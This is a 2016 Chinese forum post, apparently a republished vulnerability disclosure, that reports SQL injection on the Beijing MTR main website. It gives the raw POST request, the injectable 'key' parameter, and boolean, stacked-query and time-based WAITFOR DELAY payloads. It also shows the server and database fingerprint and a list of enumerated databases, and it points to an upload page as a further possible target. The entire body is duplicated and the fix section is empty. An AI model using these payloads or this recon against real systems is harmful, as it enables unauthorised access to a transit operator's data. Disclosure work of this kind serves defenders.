HanDs
管理员

[7月漏洞公开] 京港地铁主站存在SQL注入漏洞 



详细说明:

http://**.**.**.**/index.html



Snap154.png







抓包

code 区域
POST /Ajax/AjaxUser.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/other/soso.html?key=a%27or%27a%27=%27a
Content-Length: 59
Cookie: CNZZDATA1000053835=809273715-1464512103-http%253A%252F%252F**.**.**.**%252F%7C1464512103; ASP.NET_SessionId=qweokd55xnpxwc45ed3krr55
Connection: keep-alive

cmd=ajaxpage&pageindex=1&pagesize=5&classid=0&xgid=0&key=k



注入参数key





code 区域
---
Parameter: key (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cmd=ajaxpage&pageindex=1&pagesize=5&classid=0&xgid=0&key=a%' AND 3271=3271 AND '%'='

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: cmd=ajaxpage&pageindex=1&pagesize=5&classid=0&xgid=0&key=a%';WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: cmd=ajaxpage&pageindex=1&pagesize=5&classid=0&xgid=0&key=a%' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005





数据库



available databases [10]:

[*] BJMTR_WEB

[*] BJMTRWEB

[*] BJMTRWEBUAT01

[*] DB_InDiTie

[*] db_jgdt_en

[*] JOB

[*] master

[*] model

[*] msdb

[*] tempdb





code 区域
current database:    'BJMTR_WEB'





Snap155.png

漏洞证明:

http://**.**.**.**/index.html



Snap154.png







抓包

code 区域
POST /Ajax/AjaxUser.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/other/soso.html?key=a%27or%27a%27=%27a
Content-Length: 59
Cookie: CNZZDATA1000053835=809273715-1464512103-http%253A%252F%252F**.**.**.**%252F%7C1464512103; ASP.NET_SessionId=qweokd55xnpxwc45ed3krr55
Connection: keep-alive

cmd=ajaxpage&pageindex=1&pagesize=5&classid=0&xgid=0&key=k



注入参数key





code 区域
---
Parameter: key (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cmd=ajaxpage&pageindex=1&pagesize=5&classid=0&xgid=0&key=a%' AND 3271=3271 AND '%'='

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: cmd=ajaxpage&pageindex=1&pagesize=5&classid=0&xgid=0&key=a%';WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: cmd=ajaxpage&pageindex=1&pagesize=5&classid=0&xgid=0&key=a%' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005





数据库



available databases [10]:

[*] BJMTR_WEB

[*] BJMTRWEB

[*] BJMTRWEBUAT01

[*] DB_InDiTie

[*] db_jgdt_en

[*] JOB

[*] master

[*] model

[*] msdb

[*] tempdb





code 区域
current database:    'BJMTR_WEB'





Snap155.png





一处上传不知道能不能利用http://**.**.**.**/HR/upload.aspx

反正我不会了

修复方案:


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
#1楼
发帖时间:2016-7-15   |   查看数:0   |   回复数:0
游客组
快速回复